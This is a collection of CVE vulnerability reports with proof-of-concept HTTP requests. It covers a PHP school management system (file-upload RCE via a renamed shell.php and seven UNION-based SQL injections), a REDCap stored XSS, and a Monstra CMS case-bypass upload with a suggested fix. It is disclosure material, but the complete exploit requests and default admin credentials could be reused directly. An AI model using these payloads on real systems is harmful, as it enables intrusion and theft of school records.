itsourcecode Advanced School Management System v1.0 is vulnerable to Arbitrary code execution via ip/school/view/all_teacher.php.

Permalink

Cannot retrieve contributors at this time

**Advanced School Management System v1.0 by itsourcecode.com has arbitrary code execution (RCE)**

**Vul\_Author**: **Zhijie Tan**

vendor: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability url: ip/school/view/all\_teacher.php(RCE vulnerability exists in "edit" function of Ip/School/view/all\_teacher.php)

Loophole location：There is an arbitrary file upload vulnerability (RCE) in the "edit" function file picture upload point of the TEACHER module in the background management system. You can change the "php" suffix of "shell.php" to "png" to bypass the front-end detection, and then modify the "png" back to the original "php" by grabbing the Burp package. The "shell.php" file can be uploaded successfully after putting back the request packet.

Super Admin account password: suarez081119@gmail.com/12345

Request package for file upload：

POST /school/index.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/school/view/all\_teacher.php
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12765172874523
Content-Length: 1148
\-----------------------------12765172874523
Content-Disposition: form-data; name="full\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="i\_name"
Teacher 6
\-----------------------------12765172874523
Content-Disposition: form-data; name="address"
School
\-----------------------------12765172874523
Content-Disposition: form-data; name="gender"
Male
\-----------------------------12765172874523
Content-Disposition: form-data; name="phone"
666-666-6666
\-----------------------------12765172874523
Content-Disposition: form-data; name="email"
t6@gmail.com
\-----------------------------12765172874523
Content-Disposition: form-data; name="fileToUpload"; filename="shell.php"
Content-Type: image/jpeg
JFJF
<?php phpinfo();?>
\-----------------------------12765172874523
Content-Disposition: form-data; name="c\_page"
1
\-----------------------------12765172874523
Content-Disposition: form-data; name="id"
15
\-----------------------------12765172874523
Content-Disposition: form-data; name="do"
update\_teacher
\-----------------------------12765172874523--

The files will be uploaded to this directory \\school\\uploads  

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-32433: bug_report/RCE-1.md at main · tamchikit/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_admin_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_admin\_profile.php?my\_index=

Vulnerability location: /school/model/get\_admin\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_admin\_profile.php?my\_index=-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_admin\_profile.php?my\_index\=\-1'%20union%20select%201,2,database(),4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32381: bug_report/SQLi-11.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_teacher_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_teacher\_profile.php?my\_index=

Vulnerability location: /school/model/get\_teacher\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_teacher\_profile.php?my\_index=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_teacher\_profile.php?my\_index\=\-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32378: bug_report/SQLi-13.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_exam_timetable.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_exam\_timetable.php?id=

Vulnerability location: /school/model/get\_exam\_timetable.php?id=,id

\[+\] Payload: /school/model/get\_exam\_timetable.php?id=-1%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_exam\_timetable.php?id\=\-1%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32377: bug_report/SQLi-9.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_parents_profile.php?my_index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_parents\_profile.php?my\_index=

Vulnerability location: /school/model/get\_parents\_profile.php?my\_index=,my\_index

\[+\] Payload: /school/model/get\_parents\_profile.php?my\_index=-1'%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13,14,15--+ // Leak place ---> my\_index

Current database name: std\_db,length is 6

GET /school/model/get\_parents\_profile.php?my\_index\=\-1'%20union%20select%201,2,3,database(),5,6,7,8,9,10,11,12,13,14,15--+ HTTP/1.1
Host: 192.168.1.19
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32379: bug_report/SQLi-10.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_events.php?event_id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_events.php?event\_id=

Vulnerability location: /school/model/get\_events.php?event\_id=,id

\[+\] Payload: /school/model/get\_events.php?event\_id=-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_events.php?event\_id\=\-1%20union%20select%201,database(),3,4,5,6,7,8,9,10,11,12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32376: bug_report/SQLi-8.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_student_subject.php?index=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_student\_subject.php?index=

Vulnerability location: /school/model/get\_student\_subject.php?index=,index

\[+\] Payload: /school/model/get\_student\_subject.php?index=-1%20union%20select%201,2,3,database(),5,6--+ // Leak place ---> index

Current database name: std\_db,length is 6

GET /school/model/get\_student\_subject.php?index\=\-1%20union%20select%201,2,3,database(),5,6\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32380: bug_report/SQLi-12.md at main · k0xx11/bug_report

itsourcecode Advanced School Management System v1.0 is vulnerable to SQL Injection via /school/model/get_timetable.php?id=.

**Advanced School Management System v1.0 by itsourcecode.com has SQL injection**

Login account: suarez081119@gmail.com/12345 (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/advanced-school-management-system-in-php-with-source-code/

Vulnerability File: /school/model/get\_timetable.php?id=

Vulnerability location: /school/model/get\_timetable.php?id=,id

\[+\] Payload: /school/model/get\_timetable.php?id=-42%20union%20select%201,database(),3,4,5,6,7,8--+ // Leak place ---> id

Current database name: std\_db,length is 6

GET /school/model/get\_timetable.php?id\=\-42%20union%20select%201,database(),3,4,5,6,7,8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=kh42r202aj35u61brcutn42s96
Connection: close

CVE-2022-32375: bug_report/SQLi-6.md at main · k0xx11/bug_report

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in ProjectGeneral/edit_project_settings.php in REDCap 12.0.11. This issue allows any user with project management permissions to inject arbitrary code into the project title (app_title) field when editing an existing project. The payload is then reflected within the title tag of the page.

CVE-2022-24127: REDCap Change Log - Eastern Virginia Medical School (EVMS), Norfolk, Hampton Roads

Monstra 3.0.4 does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Brief of this vulnerability**

The Monstra 3.0.4 source code does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Test Environment**

    Apache/2.4.41 (Ubuntu20.04)
    PHP 7.4.3
    

**Affect version****POC**

    POST /monstra/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1
    Host: localhost:80
    Content-Length: 442
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost:65003
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD6KF8q8SlXAspgP7
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:65003/monstra/admin/index.php?id=filesmanager&path=uploads/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=nlofifites91aq2tsi1s520298
    Connection: close
    
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="csrf"
    
    8ff9a93b1f09f4dfa18e06c201b7355e602ea9ce
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="file"; filename="shell.Php"
    Content-Type: text/plain
    
    <?php echo "This is a test";?>
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="upload_file"
    
    上传
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7--
    

  
Execute successfully  

**Reason of This Vulnerability**

$_FILES['file']['name'] in the Upload file module does not check whether the file extension is case,Vulnerability file：/plugins/box/filesmanager/filesmanager.admin.php

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }
    

**Repair suggestions**

Add case verification at $\_FILES\['file'\]\['name'\], as follows:

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
    					$_FILES['file']['name']=strtolower($_FILES['file']['name']);  //Change uppercase to lowercase
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }

Tag

#php